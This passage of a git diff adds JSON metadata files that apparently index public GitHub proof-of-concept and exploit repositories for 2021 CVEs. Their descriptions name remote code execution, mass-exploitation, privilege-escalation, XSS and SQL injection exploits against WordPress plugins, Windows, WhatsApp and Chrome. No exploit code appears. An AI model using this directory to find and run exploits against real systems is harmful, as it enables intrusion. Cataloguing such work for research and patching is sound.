+ "forks_count": 20,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 20,
+ "watchers": 40,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 391813400,
+ "name": "CVE-2021-2394",
+ "full_name": "freeide\/CVE-2021-2394",
+ "owner": {
+ "login": "freeide",
+ "id": 33774184,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33774184?v=4",
+ "html_url": "https:\/\/github.com\/freeide"
+ },
+ "html_url": "https:\/\/github.com\/freeide\/CVE-2021-2394",
+ "description": "POC of CVE-2021-2394",
+ "fork": false,
+ "created_at": "2021-08-02T04:19:11Z",
+ "updated_at": "2023-09-28T11:30:04Z",
+ "pushed_at": "2021-08-02T02:47:54Z",
+ "stargazers_count": 23,
+ "watchers_count": 23,
+ "has_discussions": false,
+ "forks_count": 34,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 34,
+ "watchers": 23,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 394009215,
+ "name": "CVE-2021-2394",
+ "full_name": "BabyTeam1024\/CVE-2021-2394",
+ "owner": {
+ "login": "BabyTeam1024",
+ "id": 74447452,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74447452?v=4",
+ "html_url": "https:\/\/github.com\/BabyTeam1024"
+ },
+ "html_url": "https:\/\/github.com\/BabyTeam1024\/CVE-2021-2394",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-08-08T16:12:17Z",
+ "updated_at": "2023-09-28T11:30:18Z",
+ "pushed_at": "2021-08-08T16:41:28Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 438692076,
+ "name": "CVE-2021-2394",
+ "full_name": "fasanhlieu\/CVE-2021-2394",
+ "owner": {
+ "login": "fasanhlieu",
+ "id": 54527046,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54527046?v=4",
+ "html_url": "https:\/\/github.com\/fasanhlieu"
+ },
+ "html_url": "https:\/\/github.com\/fasanhlieu\/CVE-2021-2394",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-12-15T16:09:54Z",
+ "updated_at": "2024-02-21T07:47:16Z",
+ "pushed_at": "2024-02-21T07:47:12Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24027.json b/2021/CVE-2021-24027.json
new file mode 100644
index 0000000000..5654255365
--- /dev/null
+++ b/2021/CVE-2021-24027.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 346747763,
+ "name": "whatsapp-mitd-mitm",
+ "full_name": "CENSUS\/whatsapp-mitd-mitm",
+ "owner": {
+ "login": "CENSUS",
+ "id": 11769276,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11769276?v=4",
+ "html_url": "https:\/\/github.com\/CENSUS"
+ },
+ "html_url": "https:\/\/github.com\/CENSUS\/whatsapp-mitd-mitm",
+ "description": "PoC and tools for exploiting CVE-2020-6516 (Chrome) and CVE-2021-24027 (WhatsApp)",
+ "fork": false,
+ "created_at": "2021-03-11T15:27:25Z",
+ "updated_at": "2024-06-07T07:41:44Z",
+ "pushed_at": "2021-05-25T11:14:56Z",
+ "stargazers_count": 145,
+ "watchers_count": 145,
+ "has_discussions": false,
+ "forks_count": 35,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 35,
+ "watchers": 145,
+ "score": 0,
+ "subscribers_count": 17
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24084.json b/2021/CVE-2021-24084.json
new file mode 100644
index 0000000000..ea9983ed93
--- /dev/null
+++ b/2021/CVE-2021-24084.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 432334511,
+ "name": "CVE-2021-24084",
+ "full_name": "Jeromeyoung\/CVE-2021-24084",
+ "owner": {
+ "login": "Jeromeyoung",
+ "id": 39945364,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4",
+ "html_url": "https:\/\/github.com\/Jeromeyoung"
+ },
+ "html_url": "https:\/\/github.com\/Jeromeyoung\/CVE-2021-24084",
+ "description": "Windows MDM LPE",
+ "fork": false,
+ "created_at": "2021-11-27T00:45:28Z",
+ "updated_at": "2022-04-03T09:27:38Z",
+ "pushed_at": "2021-11-27T00:38:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 8,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 8,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 432673238,
+ "name": "WindowsMDM-LPE-0Day",
+ "full_name": "exploitblizzard\/WindowsMDM-LPE-0Day",
+ "owner": {
+ "login": "exploitblizzard",
+ "id": 61627070,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61627070?v=4",
+ "html_url": "https:\/\/github.com\/exploitblizzard"
+ },
+ "html_url": "https:\/\/github.com\/exploitblizzard\/WindowsMDM-LPE-0Day",
+ "description": "CVE-2021-24084 Windows Local Privilege Escalation Left officially unpatched since 2020. Hence, its still a zero day",
+ "fork": false,
+ "created_at": "2021-11-28T09:48:36Z",
+ "updated_at": "2024-06-01T20:27:04Z",
+ "pushed_at": "2022-02-21T08:30:22Z",
+ "stargazers_count": 47,
+ "watchers_count": 47,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 47,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24085.json b/2021/CVE-2021-24085.json
new file mode 100644
index 0000000000..431421650b
--- /dev/null
+++ b/2021/CVE-2021-24085.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 339107043,
+ "name": "CVE-2021-24085",
+ "full_name": "sourceincite\/CVE-2021-24085",
+ "owner": {
+ "login": "sourceincite",
+ "id": 13770985,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13770985?v=4",
+ "html_url": "https:\/\/github.com\/sourceincite"
+ },
+ "html_url": "https:\/\/github.com\/sourceincite\/CVE-2021-24085",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-15T14:41:25Z",
+ "updated_at": "2023-12-07T09:16:29Z",
+ "pushed_at": "2021-02-15T15:11:00Z",
+ "stargazers_count": 70,
+ "watchers_count": 70,
+ "has_discussions": false,
+ "forks_count": 21,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 21,
+ "watchers": 70,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24086.json b/2021/CVE-2021-24086.json
new file mode 100644
index 0000000000..1932fd6077
--- /dev/null
+++ b/2021/CVE-2021-24086.json
@@ -0,0 +1,68 @@
+[
+ {
+ "id": 355514476,
+ "name": "CVE-2021-24086",
+ "full_name": "0vercl0k\/CVE-2021-24086",
+ "owner": {
+ "login": "0vercl0k",
+ "id": 1476421,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1476421?v=4",
+ "html_url": "https:\/\/github.com\/0vercl0k"
+ },
+ "html_url": "https:\/\/github.com\/0vercl0k\/CVE-2021-24086",
+ "description": "Proof of concept for CVE-2021-24086, a NULL dereference in tcpip.sys triggered remotely.",
+ "fork": false,
+ "created_at": "2021-04-07T11:10:40Z",
+ "updated_at": "2024-05-10T10:41:33Z",
+ "pushed_at": "2021-04-15T12:46:54Z",
+ "stargazers_count": 224,
+ "watchers_count": 224,
+ "has_discussions": false,
+ "forks_count": 49,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-24086",
+ "fragmentation",
+ "ipv6",
+ "ipv6preassembledatagram",
+ "tcpip"
+ ],
+ "visibility": "public",
+ "forks": 49,
+ "watchers": 224,
+ "score": 0,
+ "subscribers_count": 6
+ },
+ {
+ "id": 431718666,
+ "name": "CVE-2021-24086-exp",
+ "full_name": "lisinan988\/CVE-2021-24086-exp",
+ "owner": {
+ "login": "lisinan988",
+ "id": 87479262,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87479262?v=4",
+ "html_url": "https:\/\/github.com\/lisinan988"
+ },
+ "html_url": "https:\/\/github.com\/lisinan988\/CVE-2021-24086-exp",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-11-25T04:56:33Z",
+ "updated_at": "2021-11-25T06:14:26Z",
+ "pushed_at": "2021-11-25T04:56:44Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24096.json b/2021/CVE-2021-24096.json
new file mode 100644
index 0000000000..c62fa60012
--- /dev/null
+++ b/2021/CVE-2021-24096.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 338023596,
+ "name": "CVE-2021-24096",
+ "full_name": "FunPhishing\/CVE-2021-24096",
+ "owner": {
+ "login": "FunPhishing",
+ "id": 77312720,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77312720?v=4",
+ "html_url": "https:\/\/github.com\/FunPhishing"
+ },
+ "html_url": "https:\/\/github.com\/FunPhishing\/CVE-2021-24096",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-02-11T12:32:34Z",
+ "updated_at": "2024-01-16T16:26:56Z",
+ "pushed_at": "2021-02-11T12:33:02Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24098.json b/2021/CVE-2021-24098.json
new file mode 100644
index 0000000000..d958eb9093
--- /dev/null
+++ b/2021/CVE-2021-24098.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 353613611,
+ "name": "CVE-2021-24098",
+ "full_name": "waleedassar\/CVE-2021-24098",
+ "owner": {
+ "login": "waleedassar",
+ "id": 5983995,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5983995?v=4",
+ "html_url": "https:\/\/github.com\/waleedassar"
+ },
+ "html_url": "https:\/\/github.com\/waleedassar\/CVE-2021-24098",
+ "description": "POC for CVE-2021-24098",
+ "fork": false,
+ "created_at": "2021-04-01T07:29:44Z",
+ "updated_at": "2023-09-28T11:26:21Z",
+ "pushed_at": "2021-04-01T07:34:23Z",
+ "stargazers_count": 13,
+ "watchers_count": 13,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 13,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24145.json b/2021/CVE-2021-24145.json
new file mode 100644
index 0000000000..37cede6b60
--- /dev/null
+++ b/2021/CVE-2021-24145.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 395869216,
+ "name": "CVE-2021-24145",
+ "full_name": "dnr6419\/CVE-2021-24145",
+ "owner": {
+ "login": "dnr6419",
+ "id": 43310843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4",
+ "html_url": "https:\/\/github.com\/dnr6419"
+ },
+ "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-24145",
+ "description": "WordPress File Upload Vulnerability, Modern Events Calendar Lite WordPress plugin before 5.16.5",
+ "fork": false,
+ "created_at": "2021-08-14T02:56:50Z",
+ "updated_at": "2023-03-28T13:28:01Z",
+ "pushed_at": "2022-02-17T01:01:25Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24155.json b/2021/CVE-2021-24155.json
new file mode 100644
index 0000000000..594baa02fd
--- /dev/null
+++ b/2021/CVE-2021-24155.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 391040356,
+ "name": "CVE-2021-24155.rb",
+ "full_name": "0dayNinja\/CVE-2021-24155.rb",
+ "owner": {
+ "login": "0dayNinja",
+ "id": 88158703,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88158703?v=4",
+ "html_url": "https:\/\/github.com\/0dayNinja"
+ },
+ "html_url": "https:\/\/github.com\/0dayNinja\/CVE-2021-24155.rb",
+ "description": "WordPress Backup Guard Authenticated Remote Code Execution Exploit",
+ "fork": false,
+ "created_at": "2021-07-30T11:28:53Z",
+ "updated_at": "2023-11-20T08:19:39Z",
+ "pushed_at": "2021-07-30T11:35:54Z",
+ "stargazers_count": 12,
+ "watchers_count": 12,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 12,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24160.json b/2021/CVE-2021-24160.json
new file mode 100644
index 0000000000..202f8cb620
--- /dev/null
+++ b/2021/CVE-2021-24160.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 497754815,
+ "name": "CVE-2021-24160",
+ "full_name": "hnthuan1998\/CVE-2021-24160",
+ "owner": {
+ "login": "hnthuan1998",
+ "id": 106500287,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106500287?v=4",
+ "html_url": "https:\/\/github.com\/hnthuan1998"
+ },
+ "html_url": "https:\/\/github.com\/hnthuan1998\/CVE-2021-24160",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-05-30T01:46:50Z",
+ "updated_at": "2022-05-30T01:46:50Z",
+ "pushed_at": "2022-05-30T01:46:51Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 497755127,
+ "name": "Exploit-CVE-2021-24160",
+ "full_name": "hnthuan1998\/Exploit-CVE-2021-24160",
+ "owner": {
+ "login": "hnthuan1998",
+ "id": 106500287,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106500287?v=4",
+ "html_url": "https:\/\/github.com\/hnthuan1998"
+ },
+ "html_url": "https:\/\/github.com\/hnthuan1998\/Exploit-CVE-2021-24160",
+ "description": "Exploit CVE-2021-24160",
+ "fork": false,
+ "created_at": "2022-05-30T01:48:27Z",
+ "updated_at": "2022-05-30T01:52:13Z",
+ "pushed_at": "2022-05-30T01:52:18Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24307.json b/2021/CVE-2021-24307.json
new file mode 100644
index 0000000000..3e71ce90f7
--- /dev/null
+++ b/2021/CVE-2021-24307.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 443710863,
+ "name": "CVE-2021-24307-all-in-one-seo-pack-admin-rce",
+ "full_name": "darkpills\/CVE-2021-24307-all-in-one-seo-pack-admin-rce",
+ "owner": {
+ "login": "darkpills",
+ "id": 209987,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/209987?v=4",
+ "html_url": "https:\/\/github.com\/darkpills"
+ },
+ "html_url": "https:\/\/github.com\/darkpills\/CVE-2021-24307-all-in-one-seo-pack-admin-rce",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-02T07:50:09Z",
+ "updated_at": "2022-09-16T22:23:18Z",
+ "pushed_at": "2022-01-02T08:27:37Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24347.json b/2021/CVE-2021-24347.json
new file mode 100644
index 0000000000..d720407961
--- /dev/null
+++ b/2021/CVE-2021-24347.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 385186614,
+ "name": "CVE-2021-24347-",
+ "full_name": "huydoppa\/CVE-2021-24347-",
+ "owner": {
+ "login": "huydoppa",
+ "id": 58453296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58453296?v=4",
+ "html_url": "https:\/\/github.com\/huydoppa"
+ },
+ "html_url": "https:\/\/github.com\/huydoppa\/CVE-2021-24347-",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-07-12T09:02:47Z",
+ "updated_at": "2021-07-12T09:04:13Z",
+ "pushed_at": "2021-07-12T09:04:10Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24356.json b/2021/CVE-2021-24356.json
new file mode 100644
index 0000000000..c52aa3092c
--- /dev/null
+++ b/2021/CVE-2021-24356.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 676669833,
+ "name": "CVE-2021-24356",
+ "full_name": "RandomRobbieBF\/CVE-2021-24356",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-24356",
+ "description": "Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Subscriber + Arbitrary Plugin Installation",
+ "fork": false,
+ "created_at": "2023-08-09T18:24:19Z",
+ "updated_at": "2023-11-13T00:41:39Z",
+ "pushed_at": "2023-08-09T18:26:57Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-24356",
+ "wordpress-exploit",
+ "wordpress-plugin"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24499.json b/2021/CVE-2021-24499.json
new file mode 100644
index 0000000000..5d5b8c9333
--- /dev/null
+++ b/2021/CVE-2021-24499.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 405638849,
+ "name": "CVE-2021-24499",
+ "full_name": "j4k0m\/CVE-2021-24499",
+ "owner": {
+ "login": "j4k0m",
+ "id": 48088579,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48088579?v=4",
+ "html_url": "https:\/\/github.com\/j4k0m"
+ },
+ "html_url": "https:\/\/github.com\/j4k0m\/CVE-2021-24499",
+ "description": "Mass exploitation of CVE-2021-24499 unauthenticated upload leading to remote code execution in Workreap theme.",
+ "fork": false,
+ "created_at": "2021-09-12T12:43:24Z",
+ "updated_at": "2023-11-22T19:24:15Z",
+ "pushed_at": "2021-09-20T09:58:17Z",
+ "stargazers_count": 19,
+ "watchers_count": 19,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 19,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 414051484,
+ "name": "cve-2021-24499",
+ "full_name": "hh-hunter\/cve-2021-24499",
+ "owner": {
+ "login": "hh-hunter",
+ "id": 91593280,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91593280?v=4",
+ "html_url": "https:\/\/github.com\/hh-hunter"
+ },
+ "html_url": "https:\/\/github.com\/hh-hunter\/cve-2021-24499",
+ "description": null,
+ "fork": false,
+ "created_at": "2021-10-06T03:07:31Z",
+ "updated_at": "2021-10-06T03:45:29Z",
+ "pushed_at": "2021-10-06T03:44:53Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 698068217,
+ "name": "CVE-2021-24499",
+ "full_name": "jytmX\/CVE-2021-24499",
+ "owner": {
+ "login": "jytmX",
+ "id": 54280101,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54280101?v=4",
+ "html_url": "https:\/\/github.com\/jytmX"
+ },
+ "html_url": "https:\/\/github.com\/jytmX\/CVE-2021-24499",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-09-29T04:53:56Z",
+ "updated_at": "2023-09-29T04:54:46Z",
+ "pushed_at": "2023-09-29T04:54:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24507.json b/2021/CVE-2021-24507.json
new file mode 100644
index 0000000000..36df02b7cd
--- /dev/null
+++ b/2021/CVE-2021-24507.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 486599533,
+ "name": "CVE-2021-24507",
+ "full_name": "RandomRobbieBF\/CVE-2021-24507",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
+ },
+ "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2021-24507",
+ "description": "Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection - CVE-2021-24507",
+ "fork": false,
+ "created_at": "2022-04-28T13:10:55Z",
+ "updated_at": "2022-04-28T13:11:23Z",
+ "pushed_at": "2022-04-28T13:11:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24545.json b/2021/CVE-2021-24545.json
new file mode 100644
index 0000000000..ccdee8c143
--- /dev/null
+++ b/2021/CVE-2021-24545.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 413699979,
+ "name": "CVE-2021-24545",
+ "full_name": "V35HR4J\/CVE-2021-24545",
+ "owner": {
+ "login": "V35HR4J",
+ "id": 54109630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54109630?v=4",
+ "html_url": "https:\/\/github.com\/V35HR4J"
+ },
+ "html_url": "https:\/\/github.com\/V35HR4J\/CVE-2021-24545",
+ "description": "The plugin does not sanitise the HTML allowed in the Bio of users, allowing them to use malicious JavaScript code, which will be executed when anyone visit a post in the frontend made by such user. As a result, user with a role as low as author could perform Cross-Site Scripting attacks against users, which could potentially lead to privilege escalation when an admin view the related post\/s.",
+ "fork": false,
+ "created_at": "2021-10-05T06:28:05Z",
+ "updated_at": "2021-10-12T14:24:58Z",
+ "pushed_at": "2021-10-05T06:29:58Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 424104785,
+ "name": "CVE-2021-24545",
+ "full_name": "dnr6419\/CVE-2021-24545",
+ "owner": {
+ "login": "dnr6419",
+ "id": 43310843,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43310843?v=4",
+ "html_url": "https:\/\/github.com\/dnr6419"
+ },
+ "html_url": "https:\/\/github.com\/dnr6419\/CVE-2021-24545",
+ "description": "WordPress Plugin HTML Author Bio description XSS",
+ "fork": false,
+ "created_at": "2021-11-03T05:41:46Z",
+ "updated_at": "2021-11-03T05:49:47Z",
+ "pushed_at": "2021-11-03T05:49:45Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-2456.json b/2021/CVE-2021-2456.json
new file mode 100644
index 0000000000..492f249d3c
--- /dev/null
+++ b/2021/CVE-2021-2456.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 407098893,
+ "name": "CVE-2021-2456",
+ "full_name": "peterjson31337\/CVE-2021-2456",
+ "owner": {
+ "login": "peterjson31337",
+ "id": 63134447,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63134447?v=4",
+ "html_url": "https:\/\/github.com\/peterjson31337"
+ },
+ "html_url": "https:\/\/github.com\/peterjson31337\/CVE-2021-2456",
+ "description": "CVE-2021-2456",
+ "fork": false,
+ "created_at": "2021-09-16T09:14:09Z",
+ "updated_at": "2023-09-28T11:31:29Z",
+ "pushed_at": "2022-05-23T04:45:03Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24563.json b/2021/CVE-2021-24563.json
new file mode 100644
index 0000000000..3863dc3f94
--- /dev/null
+++ b/2021/CVE-2021-24563.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 413698388,
+ "name": "CVE-2021-24563",
+ "full_name": "V35HR4J\/CVE-2021-24563",
+ "owner": {
+ "login": "V35HR4J",
+ "id": 54109630,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54109630?v=4",
+ "html_url": "https:\/\/github.com\/V35HR4J"
+ },
+ "html_url": "https:\/\/github.com\/V35HR4J\/CVE-2021-24563",
+ "description": "The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly",
+ "fork": false,
+ "created_at": "2021-10-05T06:21:50Z",
+ "updated_at": "2022-03-25T03:22:55Z",
+ "pushed_at": "2021-10-05T06:30:39Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-24647.json b/2021/CVE-2021-24647.json
new file mode 100644
index 0000000000..6d10c52490
--- /dev/null
+++ b/2021/CVE-2021-24647.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 654058343,
+ "name": "CVE-2021-24647",
+ "full_name": "RandomRobbieBF\/CVE-2021-24647",
+ "owner": {
+ "login": "RandomRobbieBF",
+ "id": 51722811,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4",
+ "html_url": "https:\/\/github.com\/RandomRobbieBF"
